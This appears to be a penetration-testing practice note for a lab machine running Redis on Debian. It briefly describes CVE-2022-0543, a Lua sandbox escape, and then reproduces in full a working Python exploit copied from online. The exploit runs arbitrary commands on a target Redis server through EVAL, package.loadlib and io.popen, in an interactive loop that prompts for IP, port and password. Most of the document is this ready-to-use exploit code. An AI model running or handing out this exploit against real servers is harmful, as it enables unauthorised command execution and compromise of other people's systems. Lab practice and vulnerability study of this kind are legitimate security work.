CVE-2022-0543
The target Redis instance is relatively old and might be vulnerable to CVE-2022-0543, given the target system is Debian
/Practice/Readys/3-Exploitation/attachments/{0425B0E3-D38A-461F-84B8-B9C456801E7E}.png)
A vulnerability, which was classified as critical, has been found in Redis on Debian (affected version unknown). Affected by this issue is an unknown functionality of the component Lua. The manipulation with an unknown input leads to a sandbox vulnerability. Using CWE to declare the problem leads to CWE-265. Impacted is confidentiality, integrity, and availability.
Exploit
/Practice/Readys/3-Exploitation/attachments/{BEC0A403-3A8A-479B-B9BA-C8A086606B4A}.png)
import redis
import sys
def echoMessage():
version = """
[#] Create By ::
_ _ ___ __ ____
/ \ _ __ __ _ ___| | / _ \ / _| | _ \ ___ _ __ ___ ___ _ __
/ _ \ | '_ \ / _` |/ _ \ | | | | | |_ | | | |/ _ \ '_ ` _ \ / _ \| '_ \
/ ___ \| | | | (_| | __/ | | |_| | _| | |_| | __/ | | | | | (_) | | | |
/_/ \_\_| |_|\__, |\___|_| \___/|_| |____/ \___|_| |_| |_|\___/|_| |_|
|___/ By https://aodsec.com
"""
print(version)
def shell(ip,port,cmd,auth):
lua= 'local io_l = package.loadlib("/usr/lib/x86_64-linux-gnu/liblua5.1.so.0", "luaopen_io"); local io = io_l(); local f = io.popen("'+cmd+'", "r"); local res = f:read("*a"); f:close(); return res'
r = redis.Redis(host = ip,port = port, password = auth)
script = r.eval(lua,0)
print(script)
if __name__ == '__main__':
echoMessage()
ip = input("Please input redis ip:\n>>")
port = input("Please input redis port:\n>>")
auth = input("Auth:\n>>")
if auth == "":
auth = None
while True:
cmd = input("input exec cmd:(q->exit)\n>>")
if cmd == "q" or cmd == "exit":
sys.exit()
shell(ip,port,cmd,auth)Exploit found online